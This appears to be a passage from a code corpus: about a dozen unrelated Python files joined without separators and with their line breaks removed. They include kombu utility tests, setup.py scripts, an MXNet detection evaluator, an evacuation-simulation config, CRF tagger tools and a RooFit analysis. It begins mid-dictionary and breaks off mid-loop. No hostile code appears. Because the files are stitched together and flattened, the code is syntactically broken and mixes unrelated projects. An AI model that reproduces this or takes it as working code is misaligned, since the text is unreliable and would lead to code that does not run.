'seq_nb': 1, 'lsv_identifier': ben_bank_id.lsv_identifier.upper(), 'esr_party_number': ben_bank_id.esr_party_number, 'edat': self._prepare_date( date.today()), 'rate': rate, } return properties
from __future__ import absolute_import, unicode_literals import pickle from io import StringIO, BytesIO from kombu import version_info_t from kombu import utils from kombu.five import python_2_unicode_compatible from kombu.utils.text import version_string_as_tuple from kombu.tests.case import Case, Mock, patch, mock @python_2_unicode_compatible class OldString(object): def __init__(self, value): self.value = value def __str__(self): return self.value def split(self, *args, **kwargs): return self.value.split(*args, **kwargs) def rsplit(self, *args, **kwargs): return self.value.rsplit(*args, **kwargs) class test_kombu_module(Case): def test_dir(self): import kombu self.assertTrue(dir(kombu)) class test_utils(Case): def test_maybe_list(self): self.assertEqual(utils.maybe_list(None), []) self.assertEqual(utils.maybe_list(1), [1]) self.assertEqual(utils.maybe_list([1, 2, 3]), [1, 2, 3]) def test_fxrange_no_repeatlast(self): self.assertEqual(list(utils.fxrange(1.0, 3.0, 1.0)), [1.0, 2.0, 3.0]) def test_fxrangemax(self): self.assertEqual(list(utils.fxrangemax(1.0, 3.0, 1.0, 30.0)), [1.0, 2.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0, 3.0]) self.assertEqual(list(utils.fxrangemax(1.0, None, 1.0, 30.0)), [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]) def test_reprkwargs(self): self.assertTrue(utils.reprkwargs({'foo': 'bar', 1: 2, 'k': 'v'})) def test_reprcall(self): self.assertTrue( utils.reprcall('add', (2, 2), {'copy': True}), ) class test_UUID(Case): def test_uuid4(self): self.assertNotEqual(utils.uuid4(), utils.uuid4()) def test_uuid(self): i1 = utils.uuid() i2 = utils.uuid() self.assertIsInstance(i1, str) self.assertNotEqual(i1, i2) class MyStringIO(StringIO): def close(self): pass class MyBytesIO(BytesIO): def close(self): pass class test_emergency_dump_state(Case): @mock.stdouts def test_dump(self, stdout, stderr): fh = MyBytesIO() utils.emergency_dump_state( {'foo': 'bar'}, open_file=lambda n, m: fh) self.assertDictEqual( pickle.loads(fh.getvalue()), {'foo': 'bar'}) self.assertTrue(stderr.getvalue()) self.assertFalse(stdout.getvalue()) @mock.stdouts def test_dump_second_strategy(self, stdout, stderr): fh = MyStringIO() def raise_something(*args, **kwargs): raise KeyError('foo') utils.emergency_dump_state( {'foo': 'bar'}, open_file=lambda n, m: fh, dump=raise_something ) self.assertIn('foo', fh.getvalue()) self.assertIn('bar', fh.getvalue()) self.assertTrue(stderr.getvalue()) self.assertFalse(stdout.getvalue()) class test_retry_over_time(Case): def setup(self): self.index = 0 class Predicate(Exception): pass def myfun(self): if self.index < 9: raise self.Predicate() return 42 def errback(self, exc, intervals, retries): interval = next(intervals) sleepvals = (None, 2.0, 4.0, 6.0, 8.0, 10.0, 12.0, 14.0, 16.0, 16.0) self.index += 1 self.assertEqual(interval, sleepvals[self.index]) return interval @mock.sleepdeprived(module=utils) def test_simple(self): prev_count, utils.count = utils.count, Mock() try: utils.count.return_value = list(range(1)) x = utils.retry_over_time(self.myfun, self.Predicate, errback=None, interval_max=14) self.assertIsNone(x) utils.count.return_value = list(range(10)) cb = Mock() x = utils.retry_over_time(self.myfun, self.Predicate, errback=self.errback, callback=cb, interval_max=14) self.assertEqual(x, 42) self.assertEqual(self.index, 9) cb.assert_called_with() finally: utils.count = prev_count @mock.sleepdeprived(module=utils) def test_retry_once(self): with self.assertRaises(self.Predicate): utils.retry_over_time( self.myfun, self.Predicate, max_retries=1, errback=self.errback, interval_max=14, ) self.assertEqual(self.index, 1) # no errback with self.assertRaises(self.Predicate): utils.retry_over_time( self.myfun, self.Predicate, max_retries=1, errback=None, interval_max=14, ) @mock.sleepdeprived(module=utils) def test_retry_always(self): Predicate = self.Predicate class Fun(object): def __init__(self): self.calls = 0 def __call__(self, *args, **kwargs): try: if self.calls >= 10: return 42 raise Predicate() finally: self.calls += 1 fun = Fun() self.assertEqual( utils.retry_over_time( fun, self.Predicate, max_retries=0, errback=None, interval_max=14, ), 42, ) self.assertEqual(fun.calls, 11) class test_cached_property(Case): def test_deleting(self): class X(object): xx = False @utils.cached_property def foo(self): return 42 @foo.deleter # noqa def foo(self, value): self.xx = value x = X() del(x.foo) self.assertFalse(x.xx) x.__dict__['foo'] = 'here' del(x.foo) self.assertEqual(x.xx, 'here') def test_when_access_from_class(self): class X(object): xx = None @utils.cached_property def foo(self): return 42 @foo.setter # noqa def foo(self, value): self.xx = 10 desc = X.__dict__['foo'] self.assertIs(X.foo, desc) self.assertIs(desc.__get__(None), desc) self.assertIs(desc.__set__(None, 1), desc) self.assertIs(desc.__delete__(None), desc) self.assertTrue(desc.setter(1)) x = X() x.foo = 30 self.assertEqual(x.xx, 10) del(x.foo) class test_symbol_by_name(Case): def test_instance_returns_instance(self): instance = object() self.assertIs(utils.symbol_by_name(instance), instance) def test_returns_default(self): default = object() self.assertIs( utils.symbol_by_name('xyz.ryx.qedoa.weq:foz', default=default), default, ) def test_no_default(self): with self.assertRaises(ImportError): utils.symbol_by_name('xyz.ryx.qedoa.weq:foz') def test_imp_reraises_ValueError(self): imp = Mock() imp.side_effect = ValueError() with self.assertRaises(ValueError): utils.symbol_by_name('kombu.Connection', imp=imp) def test_package(self): from kombu.entity import Exchange self.assertIs( utils.symbol_by_name('.entity:Exchange', package='kombu'), Exchange, ) self.assertTrue(utils.symbol_by_name(':Consumer', package='kombu')) class test_ChannelPromise(Case): def test_repr(self): obj = Mock(name='cb') self.assertIn( 'promise', repr(utils.ChannelPromise(obj)), ) obj.assert_not_called() class test_entrypoints(Case): @mock.mask_modules('pkg_resources') def test_without_pkg_resources(self): self.assertListEqual(list(utils.entrypoints('kombu.test')), []) @mock.module_exists('pkg_resources') def test_with_pkg_resources(self): with patch('pkg_resources.iter_entry_points', create=True) as iterep: eps = iterep.return_value = [Mock(), Mock()] self.assertTrue(list(utils.entrypoints('kombu.test'))) iterep.assert_called_with('kombu.test') eps[0].load.assert_called_with() eps[1].load.assert_called_with() class test_shufflecycle(Case): def test_shuffles(self): prev_repeat, utils.repeat = utils.repeat, Mock() try: utils.repeat.return_value = list(range(10)) values = {'A', 'B', 'C'} cycle = utils.shufflecycle(values) seen = set() for i in range(10): next(cycle) utils.repeat.assert_called_with(None) self.assertTrue(seen.issubset(values)) with self.assertRaises(StopIteration): next(cycle) next(cycle) finally: utils.repeat = prev_repeat class test_version_string_as_tuple(Case): def test_versions(self): self.assertTupleEqual( version_string_as_tuple('3'), version_info_t(3, 0, 0, '', ''), ) self.assertTupleEqual( version_string_as_tuple('3.3'), version_info_t(3, 3, 0, '', ''), ) self.assertTupleEqual( version_string_as_tuple('3.3.1'), version_info_t(3, 3, 1, '', ''), ) self.assertTupleEqual( version_string_as_tuple('3.3.1a3'), version_info_t(3, 3, 1, 'a3', ''), ) self.assertTupleEqual( version_string_as_tuple('3.3.1a3-40c32'), version_info_t(3, 3, 1, 'a3', '40c32'), ) self.assertEqual( version_string_as_tuple('3.3.1.a3.40c32'), version_info_t(3, 3, 1, 'a3', '40c32'), ) class test_maybe_fileno(Case): def test_maybe_fileno(self): self.assertEqual(utils.maybe_fileno(3), 3) f = Mock(name='file') self.assertIs(utils.maybe_fileno(f), f.fileno()) f.fileno.side_effect = ValueError() self.assertIsNone(utils.maybe_fileno(f))
from mongoengine import * from models.zips import Zips from geopy import distance from geopy import Point connect('scratch', host='mongodb://') # zipins = Zips(zipcode=999999, city="testlocation", loc=[1.0,1.0],pop=12345, state="ZZ").save() locationList = [] location = {} distanceList = [] for zip in Zips.objects: locationList.append(zip) for location1 in locationList: if location1.city=="BEVERLY HILLS" : point1 = Point(location1.loc[0], location1.loc[1]) for location2 in locationList: if location1 != location2 and location2.city !="BEVERLY HILLS": point2 = Point(location2.loc[0], location2.loc[1]) if(distance.distance(point1, point2) < 5): distanceList.append(location2) for location in distanceList: print (location.city, location.zipcode)
from setuptools import setup license = open('LICENSE.txt').read() setup( name='iloveck101', version='0.5.2', author='tzangms', author_email='[email protected]', packages=['iloveck101'], url='https://github.com/tzangms/iloveck101', license=license, description='Download images from ck101 thread', test_suite='tests', long_description=open('README.md').read(), entry_points = { 'console_scripts': [ 'iloveck101 = iloveck101.iloveck101:main', ] }, install_requires = [ "lxml==3.2.4", "requests==2.0.1", "gevent==1.0", "more-itertools==2.2", ], )
#pylint: disable=C0301, C0103, W0212, W0401 """ .. module:: pilot :platform: Unix :synopsis: RADICAL-Pilot is a distributed Pilot-Job framework. .. moduleauthor:: Ole Weidner <[email protected]> """ __copyright__ = "Copyright 2013-2014, http://radical.rutgers.edu" __license__ = "MIT" # ------------------------------------------------------------------------------ # Scheduler name constant from types import * from states import * from logentry import * from scheduler import * # ------------------------------------------------------------------------------ # from url import Url from exceptions import * from session import Session from context import Context from unit_manager import UnitManager from compute_unit import ComputeUnit from compute_unit_description import ComputeUnitDescription from pilot_manager import PilotManager from compute_pilot import ComputePilot from compute_pilot_description import ComputePilotDescription from resource_config import ResourceConfig from staging_directives import COPY, LINK, MOVE, TRANSFER, SKIP_FAILED, CREATE_PARENTS # ------------------------------------------------------------------------------ # from utils.logger import logger import os import radical.utils as ru import radical.utils.logger as rul pwd = os.path.dirname (__file__) root = "%s/.." % pwd version, version_detail, version_branch, sdist_name, sdist_path = ru.get_version ([root, pwd]) # FIXME: the logger init will require a 'classical' ini based config, which is # different from the json based config we use now. May need updating once the # radical configuration system has changed to json _logger = rul.logger.getLogger ('radical.pilot') _logger.info ('radical.pilot version: %s' % version_detail) # ------------------------------------------------------------------------------
# -*- coding: utf-8 -*- import unittest from unittest.mock import patch from hypothesis import given from hypothesis.strategies import integers from pokebase import APIResource, loaders from pokebase.common import ENDPOINTS def builder(func, func_name): @given(id_=integers(min_value=1)) @patch('pokebase.interface.get_data') def test(self, mock_get_data, id_): mock_get_data.side_effect = [{'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]}, {'simple_attr': 10, 'list_attr': [{'name': 'mocked name'}], 'complex_attr': {'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, 10)}}, {'count': 1, 'results': [{'url': 'mocked.url/api/v2/{}/{}/'.format(func_name, id_)}]}] self.assertIsInstance(func(id_), APIResource) return test class TestFunctions_loaders(unittest.TestCase): @classmethod def setUpClass(cls): for endpoint in ENDPOINTS: if endpoint in ['type']: # special cases, need trailing underscore func_name = ''.join([endpoint.replace('-', '_'), '_']) else: func_name = endpoint.replace('-', '_') func = getattr(loaders, func_name) setattr(cls, 'testLoader_{}'.format(func_name), builder(func, endpoint)) TestFunctions_loaders.setUpClass()
from __future__ import print_function import os import sys import importlib import mxnet as mx from dataset.iterator import DetRecordIter from config.config import cfg from evaluate.eval_metric import MApMetric, VOC07MApMetric import logging from symbol.symbol_factory import get_symbol def evaluate_net(net, path_imgrec, num_classes, mean_pixels, data_shape, model_prefix, epoch, ctx=mx.cpu(), batch_size=1, path_imglist="", nms_thresh=0.45, force_nms=False, ovp_thresh=0.5, use_difficult=False, class_names=None, voc07_metric=False, frequent=20): """ evalute network given validation record file Parameters: ---------- net : str or None Network name or use None to load from json without modifying path_imgrec : str path to the record validation file path_imglist : str path to the list file to replace labels in record file, optional num_classes : int number of classes, not including background mean_pixels : tuple (mean_r, mean_g, mean_b) data_shape : tuple or int (3, height, width) or height/width model_prefix : str model prefix of saved checkpoint epoch : int load model epoch ctx : mx.ctx mx.gpu() or mx.cpu() batch_size : int validation batch size nms_thresh : float non-maximum suppression threshold force_nms : boolean whether suppress different class objects ovp_thresh : float AP overlap threshold for true/false postives use_difficult : boolean whether to use difficult objects in evaluation if applicable class_names : comma separated str class names in string, must correspond to num_classes if set voc07_metric : boolean whether to use 11-point evluation as in VOC07 competition frequent : int frequency to print out validation status """ # set up logger logging.basicConfig() logger = logging.getLogger() logger.setLevel(logging.INFO) # args if isinstance(data_shape, int): data_shape = (3, data_shape, data_shape) assert len(data_shape) == 3 and data_shape[0] == 3 #model_prefix += '_' + str(data_shape[1]) # iterator eval_iter = DetRecordIter(path_imgrec, batch_size, data_shape, path_imglist=path_imglist, **cfg.valid) # model params load_net, args, auxs = mx.model.load_checkpoint(model_prefix, epoch) # network if net is None: net = load_net else: net = get_symbol(net, data_shape[1], num_classes=num_classes, nms_thresh=nms_thresh, force_suppress=force_nms) if not 'label' in net.list_arguments(): label = mx.sym.Variable(name='label') net = mx.sym.Group([net, label]) # init module mod = mx.mod.Module(net, label_names=('label',), logger=logger, context=ctx, fixed_param_names=net.list_arguments()) mod.bind(data_shapes=eval_iter.provide_data, label_shapes=eval_iter.provide_label) mod.set_params(args, auxs, allow_missing=False, force_init=True) # run evaluation if voc07_metric: metric = VOC07MApMetric(ovp_thresh, use_difficult, class_names, roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc')) else: metric = MApMetric(ovp_thresh, use_difficult, class_names, roc_output_path=os.path.join(os.path.dirname(model_prefix), 'roc')) results = mod.score(eval_iter, metric, num_batch=None, batch_end_callback=mx.callback.Speedometer(batch_size, frequent=frequent, auto_reset=False)) for k, v in results: print("{}: {}".format(k, v))
import sys, os, multiprocessing, subprocess, time src = os.path.abspath(os.path.join(os.path.dirname(__file__), 'src', 'sakia')) res = os.path.abspath(os.path.join(os.path.dirname(__file__), 'res')) pro_file_template = """ FORMS = {0} SOURCES = {1} TRANSLATIONS = {2} """ def generate_pro(): sources = [] forms = [] translations = [] project_filename = os.path.abspath(os.path.join( os.path.dirname(__file__), "sakia-ts-{0}".format(int(time.time())))) for root, dirs, files in os.walk(src): for f in files: if f.endswith('.py') and not f.endswith('_uic.py'): sources.append(os.path.join(root, f)) else: continue print(os.path.join(root, f)) for root, dirs, files in os.walk(res): for f in files: if f.endswith('.ui'): forms.append(os.path.join(root, f)) elif f.endswith('.ts'): translations.append(os.path.join(root, f)) else: continue print(os.path.join(root, f)) with open(project_filename, 'w') as outfile: outfile.write(pro_file_template.format(""" \\ """.join(forms), """ \\ """.join(sources), """ \\ """.join(translations))) return project_filename pro_file = generate_pro() try: if "-noobsolete" in sys.argv: print("Removing obsolete strings...") subprocess.call(["pylupdate5", "-noobsolete", pro_file]) else: subprocess.call(["pylupdate5", pro_file]) finally: os.remove(pro_file)
from soba.models.continuousModel import ContinuousModel import soba.visualization.ramen.mapGenerator as ramen import soba.run from collections import OrderedDict import json from time import time import sys from model import SEBAModel from visualization.back import Visualization import datetime as dt aStar = False strategies = ['nearest', 'safest', 'uncrowded'] # Simulation configuration today = dt.date.today() timeHazard = "10:30:00" #Only two are neccesary families = [{'N': 4, 'child': 2, 'adult': 2}] sebaConfiguration = {'families': [], 'hazard': timeHazard} # Occupancy atributtes jsonsOccupants = [] strategy = strategies[0] N = 40 NDis = 0 fov = True speed = 1.38 speedDis = 0.7 #states = OrderedDict([('Free time','out'), ('Rest', 'wp'), ('Lunch','out'), ('Work', 'wp')]) states = OrderedDict([('Free time','out'), ('Lunch','out'), ('Work', 'wp')]) schedule = {'t1': "09:00:00", 't2': "10:00:00", 't3': "11:00:00", 't4': "18:00:00"} variation = {'t1': "00:50:00", 't2': "00:30:00", 't3': "00:30:00", 't4': "00:59:00"} markovActivity = { '-t1': [[100, 0, 0], [100, 0, 0], [100, 0, 0], [100, 0, 0]], 't1-t2': [[0, 0, 70], [0, 0, 90], [0, 0, 80], [0, 0, 60]], 't2-t3': [[100, 0, 0], [0, 20, 60], [20, 50, 40], [0, 70, 30]], 't3-t4': [[100, 0, 0], [0, 20, 60], [0, 0, 70], [20, 0, 70]], 't4-': [[100, 0, 0], [70, 0, 30], [70, 0, 30], [70, 0, 30]] } timeActivity = { '-t1': [3, 0, 0], 't1-t2': [0, 0, 45], 't2-t3': [0, 50, 45], 't3-t4': [0, 20, 45], 't4-': [3, 10, 20] } timeActivityVariation = { '-t1': [0, 0, 0], 't1-t2': [0, 0, 10], 't2-t3': [0, 10, 10], 't3-t4': [0, 5, 10], 't4-': [0,5, 10] } jsonOccupant = {'type': 'regular' , 'astar': aStar, 'N': N, 'states': states , 'schedule': schedule, 'variation': variation, 'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation, 'strategy': strategy, 'speedEmergency': speed, 'shape': 'rect', 'fov': fov} jsonsOccupants.append(jsonOccupant) jsonOccupantDis = {'type': 'dis' , 'astar': aStar, 'N': NDis, 'states': states , 'schedule': schedule, 'variation': variation, 'markovActivity': markovActivity, 'timeActivity': timeActivity, 'timeActivityVariation': timeActivityVariation, 'strategy': strategy, 'speedEmergency': speedDis, 'fov': fov} jsonsOccupants.append(jsonOccupantDis) #with open('auxiliarFiles/labgsi.blueprint3d') as data_file: # jsonMap = ramen.returnMap(data_file, offsety = 9, offsetx = 0) #cellW = 20 #cellH = 20 #with open('auxiliarFiles/uclm_furniture1_new.blueprint3d') as data_file: #jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0) #cellW = 113 #cellH = 80 with open('auxiliarFiles/uclm_furniture2_new.blueprint3d') as data_file: jsonMap = ramen.returnMap(data_file, offsety = 21, offsetx = 0) cellW = 113 cellH = 80 if len(sys.argv) > 1 and sys.argv[1] == '-v': back = Visualization(cellW, cellH) parameters = {'width': cellW, 'height': cellH, 'jsonMap': jsonMap, 'jsonsOccupants': jsonsOccupants, 'sebaConfiguration': sebaConfiguration} soba.run.run(SEBAModel, parameters, visualJS="visualization/front.js", back=back) else: fixed_params = {"width": cellW, "height": cellH, "jsonMap": jsonMap, "jsonsOccupants": jsonsOccupants, 'sebaConfiguration': sebaConfiguration} variable_params = {"seed": range(10, 500, 10)} soba.run.run(SEBAModel, fixed_params, variable_params)
#!/usr/bin/env python """ Copyright (c) 2012, Aaron Meier All rights reserved. See LICENSE for more information. """ from distutils.core import setup import os from gitgate import __version__ setup(name='gitgate', version = __version__, description = 'Dead simple gatekeeping code review for Git', long_description = ( "GitGate provides a GUI frontend (via Flask) for pre-merge code review." ), author = 'Aaron Meier', author_email = '[email protected]', packages = ['gitgate'], package_dir={'gitgate':'gitgate'}, package_data={'gitgate':['templates/*', 'static/bootstrap3/*/*', 'static/jquery/*.js']}, scripts=['gitgate/scripts/gitgate'], url = 'http://gitgate.nullism.com', install_requires = ['peewee>=2.2.3', 'flask>=0.9', 'argparse>=1'], license = 'MIT', provides = ['gitgate'] )
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import print_function from builtins import zip import pycrfsuite def compareTaggers(model1, model2, string_list, module_name): """ Compare two models. Given a list of strings, prints out tokens & tags whenever the two taggers parse a string differently. This is for spot-checking models :param tagger1: a .crfsuite filename :param tagger2: another .crfsuite filename :param string_list: a list of strings to be checked :param module_name: name of a parser module """ module = __import__(module_name) tagger1 = pycrfsuite.Tagger() tagger1.open(module_name+'/'+model1) tagger2 = pycrfsuite.Tagger() tagger2.open(module_name+'/'+model2) count_discrepancies = 0 for string in string_list: tokens = module.tokenize(string) if tokens: features = module.tokens2features(tokens) tags1 = tagger1.tag(features) tags2 = tagger2.tag(features) if tags1 != tags2: count_discrepancies += 1 print('\n') print("%s. %s" %(count_discrepancies, string)) print('-'*75) print_spaced('token', model1, model2) print('-'*75) for token in zip(tokens, tags1, tags2): print_spaced(token[0], token[1], token[2]) print("\n\n%s of %s strings were labeled differently"%(count_discrepancies, len(string_list))) def print_spaced(s1, s2, s3): n = 25 print(s1 + " "*(n-len(s1)) + s2 + " "*(n-len(s2)) + s3) def validateTaggers(model1, model2, labeled_string_list, module_name): module = __import__(module_name) tagger1 = pycrfsuite.Tagger() tagger1.open(module_name+'/'+model1) tagger2 = pycrfsuite.Tagger() tagger2.open(module_name+'/'+model2) wrong_count_1 = 0 wrong_count_2 = 0 wrong_count_both = 0 correct_count = 0 for labeled_string in labeled_string_list: unlabeled_string, components = labeled_string tokens = module.tokenize(unlabeled_string) if tokens: features = module.tokens2features(tokens) _, tags_true = list(zip(*components)) tags_true = list(tags_true) tags1 = tagger1.tag(features) tags2 = tagger2.tag(features) if (tags1 != tags_true) and (tags2 != tags_true): print("\nSTRING: ", unlabeled_string) print("TRUE: ", tags_true) print("*%s: "%model1, tags1) print("*%s: "%model2, tags2) wrong_count_both += 1 elif (tags1 != tags_true): print("\nSTRING: ", unlabeled_string) print("TRUE: ", tags_true) print("*%s: "%model1, tags1) print("%s: "%model2, tags2) wrong_count_1 += 1 elif (tags2 != tags_true): print("\nSTRING: ", unlabeled_string) print("TRUE: ", tags_true) print("%s: "%model1, tags1) print("*%s: "%model2, tags2) wrong_count_2 += 1 else: correct_count += 1 print("\n\nBOTH WRONG: ", wrong_count_both) print("%s WRONG: %s" %(model1, wrong_count_1)) print("%s WRONG: %s" %(model2, wrong_count_2)) print("BOTH CORRECT: ", correct_count)
#! /usr/bin/env python3 # -*- coding: utf-8 -*- import sys import os import unittest sys.path.insert(0, os.path.abspath('..')) import dxpad._contest as _contest class SignalMonitor: signal_received = False signal_value = None def __init__(self, signal): signal.connect(self.signal_receiver) def signal_receiver(self, value = None): self.signal_received = True self.signal_value = value class TestCurrentQso(unittest.TestCase): def test_create(self): qso = _contest.CurrentQso(_contest.Exchange()) def test_next_increases_serial(self): qso = _contest.CurrentQso(_contest.Exchange()) qso.next() self.assertEqual(qso.serial, 2) def test_next_updates_exchange_out(self): exchange = _contest.SerialExchange() qso = _contest.CurrentQso(exchange) qso.serial = 123 qso.next() self.assertEqual(exchange.serial, 124) def test_next_clears_inputs(self): qso = _contest.CurrentQso(_contest.SerialExchange()) qso.call = "the call" qso.exchange_in = "the exchange in" qso.call_valid = True qso.exchange_in_valid = True qso.complete = True qso.next() self.assertEqual(qso.call, "") self.assertEqual(qso.exchange_in, "") self.assertFalse(qso.call_valid) self.assertFalse(qso.exchange_in_valid) self.assertFalse(qso.complete) def test_next_emits_changed_invalid_and_incomplete(self): qso = _contest.CurrentQso(_contest.SerialExchange()) qso.call_valid = True qso.exchange_in_valid = True qso.complete = True monitor_changed = SignalMonitor(qso.changed) monitor_call = SignalMonitor(qso.call_is_valid) monitor_exchange_in = SignalMonitor(qso.exchange_in_is_valid) monitor_complete = SignalMonitor(qso.completed) qso.next() self.assertTrue(monitor_changed.signal_received) self.assertTrue(monitor_call.signal_received) self.assertFalse(monitor_call.signal_value) self.assertTrue(monitor_exchange_in.signal_received) self.assertFalse(monitor_exchange_in.signal_value) self.assertTrue(monitor_complete.signal_received) self.assertFalse(monitor_complete.signal_value) def test_set_call_valid_emits_call_is_valid(self): qso = _contest.CurrentQso(_contest.Exchange()) monitor = SignalMonitor(qso.call_is_valid) qso.set_call("N1") self.assertFalse(monitor.signal_received) qso.set_call("N1MM") self.assertTrue(monitor.signal_received) self.assertTrue(monitor.signal_value) def test_set_exchange_in_valid_emits_exchange_in_is_valid(self): qso = _contest.CurrentQso(_contest.Exchange()) monitor = SignalMonitor(qso.exchange_in_is_valid) qso.set_exchange_in("1") self.assertTrue(monitor.signal_received) self.assertTrue(monitor.signal_value) class TestSerialExchange(unittest.TestCase): def test_str_padding_with_zeros(self): exchange = _contest.SerialExchange() self.assertEqual(str(exchange), "599001") def test_str_padding_only_to_three_digits(self): exchange = _contest.SerialExchange() exchange.serial = 1000 self.assertEqual(str(exchange), "5991000") def test_next_uses_serial_of_qso(self): exchange = _contest.SerialExchange() qso = _contest.CurrentQso(exchange) qso.serial = 123 exchange.next(qso) self.assertEqual(exchange.serial, 123) def test_next_emits_changed(self): exchange = _contest.SerialExchange() monitor = SignalMonitor(exchange.changed) exchange.next(_contest.CurrentQso(exchange)) self.assertTrue(monitor.signal_received)
#!/usr/bin/env python # https://github.com/svenkreiss/PyROOTUtils/blob/master/PyROOTUtils/Graph.py __author__ = "Kyle Cranmer <[email protected]" __version__ = "0.1" ''' This is a research work in progress. Define model mu_s*Gaus(x|alpha,sigma)+mu_b*flat(x) Generate {x} for several {alpha} Calculate power (expected significance) for some alpha using profile likelihood approach 1) Train NN for alpha=0. 1a) make (histfactory/on the fly) model for NN with alpha variations - calculate power 1b) make pdf on the fly for each value of alpha 2) Train NN with {x,alpha} a) make histfactory model for NN with alpha variations using same alpha as input to NN - calculate power b) make pdf on the fly for NN with alpha variations using same alpha as input to NN - calculate power ''' import ROOT import numpy as np from sklearn import svm, linear_model, gaussian_process from sklearn.neural_network import BernoulliRBM from sklearn.ensemble import AdaBoostClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.externals import joblib import matplotlib.pyplot as plt import os.path def createdPdfForFixed(): ''' Read in learner saved in fixed.pkl Evaluate outputs for several parameter points. Generate histograms for each point. (to do: create parametrized pdf that interpolates across these pdfs) ''' clf = joblib.load('fixed.pkl') trainAndTarget = np.loadtxt('traindata.dat') traindata = trainAndTarget[:,0:2] targetdata = trainAndTarget[:,2] massPoints = np.unique(traindata[:,1]) fixedhists=[] c1 = ROOT.TCanvas() for j, name in enumerate(['sig','bkg']): for i, mass in enumerate(massPoints): #bkg part #plt.hist(outputs[i*chunk+shift: \ # (i+1)*chunk+shift], 30, alpha=0.3) #sig part hist = ROOT.TH1F('h{0}hist{1}'.format(name,i),"hist",30,-0.1,1.2) fixedhists.append(hist) for val in outputs[i*chunk+j*shift: (i+1)*chunk+j*shift]: hist.Fill(val) if i==0: hist.Draw() else: hist.Draw('same') c1.SaveAs('roothists.pdf') def createPdfForAdaptive_tree(tree): ''' Read in learner saved in adaptive.pkl Evaluate outputs for several parameter points, using true value for parameter Generate histograms for each point. create parametrized pdf that interpolates across these pdfs ''' bins=30 low=0. high=1. # loop over the tree, build histograms of output for target=(0,1), different mx values i=0 var_points = [ [] , [] ] adaptivehists = [ [] , [] ] while (tree.GetEntry(i)): # have we seen this mx before? try: # if so, get the index ind = var_points[int(tree.target)].index(tree.mx) except ValueError: # if no, add to our list and make a histogram for it, then get the index var_points[int(tree.target)].append(tree.mx) ind = var_points[int(tree.target)].index(tree.mx) hist = ROOT.TH1F('h{0}hist{1}'.format(int(tree.target),ind),"hist",bins,low,high) adaptivehists[int(tree.target)].append(hist) # if (i%1000==0): # print ' entry ', i , ' mx = ', tree.mx, ' target = ', tree.target, ' ind = ',ind,var_points[0],var_points[1] # fill the histogram adaptivehists[int(tree.target)][ind].Fill(tree.MLP) i=i+1 # sort them by the var_points for target in 0,1: var_points[target], adaptivehists[target] = zip(*sorted(zip(var_points[target],adaptivehists[target]))) print var_points print adaptivehists # build RooWorld stuff w = ROOT.RooWorkspace('w') w.factory('mx[{0},{1}]'.format( var_points[0][0],var_points[0][len(var_points[0])-1])) w.factory('score[{0},{1}]'.format(low,high)) s = w.var('score') mu = w.var('mx') adpativedatahists=[[],[]] adpativehistpdfs=[[],[]] for target in 0,1: for ind in range(0,len(var_points[target])): print "Building RooWorld stuff for target",target," index ",ind print " mx = ", var_points[target][ind], " mean = ", adaptivehists[target][ind].GetMean(), " rms = ", adaptivehists[target][ind].GetRMS() datahist = ROOT.RooDataHist('dh{0}datahist{1}'.format(target,ind),"hist", ROOT.RooArgList(s), adaptivehists[target][ind]) order=1 s.setBins(bins) histpdf = ROOT.RooHistPdf('hp{0}histpdf{1}'.format(target,ind),"hist", ROOT.RooArgSet(s), datahist,order) histpdf.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator') getattr(w,'import')(datahist) # work around for morph = w.import(morph) getattr(w,'import')(histpdf) # work around for morph = w.import(morph) adpativedatahists[target].append(datahist) adpativehistpdfs[target].append(histpdf) w = makeBSpline(w,mu,s,adpativehistpdfs[target], var_points[target], 'm{0}morph'.format(target)) morph = w.pdf('m{0}morph'.format(target)) morph.specialIntegratorConfig(ROOT.kTRUE).method1D().setLabel('RooBinIntegrator') print morph # make dataset, add to workspace w.factory('mwwbb[500,7000]') w.factory('mx[350,1600]') w.factory('target[-1,2]') w.defineSet('inputvars','mwwbb,mx') w.defineSet('treevars','mwwbb,mx,target') w.defineSet('obsvars','mwwbb') alldata = ROOT.RooDataSet('alldata','',tree, w.set('treevars')) alldata.Print() toydata = alldata.reduce(ROOT.RooFit.Cut('mx==1000.')) toydata.Print() obsdata = toydata.reduce(ROOT.RooFit.SelectVars(w.set('obsvars'))) obsdata.Print() obsdata = ROOT.RooDataSet('obsdata','',tree, w.set('obsvars')) getattr(w,'import')(alldata) getattr(w,'import')(obsdata) w.Print() w.writeToFile("workspace_adaptive_tree.root") def createPdfForAdaptive(): f = ROOT.TFile("ttbar_14tev_jes1_eval.root") nt = f.Get("nto") createPdfForAdaptive_tree(nt) def plotScore(): ROOT.gSystem.Load( 'TMVAWrapper/libTMVAWrapper' ) ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+") ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+") f = ROOT.TFile('workspace_adaptive_tree.root','r') w = f.Get('w') inputVars = ROOT.RooArgList(w.set('inputvars')) inputVars.Print() nn = ROOT.TMVAWrapper('nn','nn',inputVars,"TMVARegression_ttbar_14tev_jes1.root_MLP.weights.xml") frame = w.var('mwwbb').frame() for x in np.linspace(400,1600,20): w.var('mx').setVal(x) nn.plotOn(frame) c1 = ROOT.TCanvas("c2",'',400,400) frame.Draw() c1.SaveAs('tmva.pdf') frame = w.var('mx').frame() w.var('mwwbb').setVal(800) for x in np.linspace(400,1600,20): w.var('mwwbb').setVal(x) nn.plotOn(frame) frame.Draw() c1.SaveAs('tmva_vs_mx.pdf') def plotAdaptive(): ''' make plots of the output of the parametrized model ''' #import class code should work automatically, but confused by namespace ROOT.gROOT.ProcessLine(".L RooBSplineBases.cxx+") ROOT.gROOT.ProcessLine(".L RooBSpline.cxx+") f = ROOT.TFile('workspace_adaptive_tree.root','r') w = f.Get('w') c1 = ROOT.TCanvas("c2",'',400,400) frame = w.var('score').frame() c1.SetLogy(); for val in np.linspace(400,1500,100): 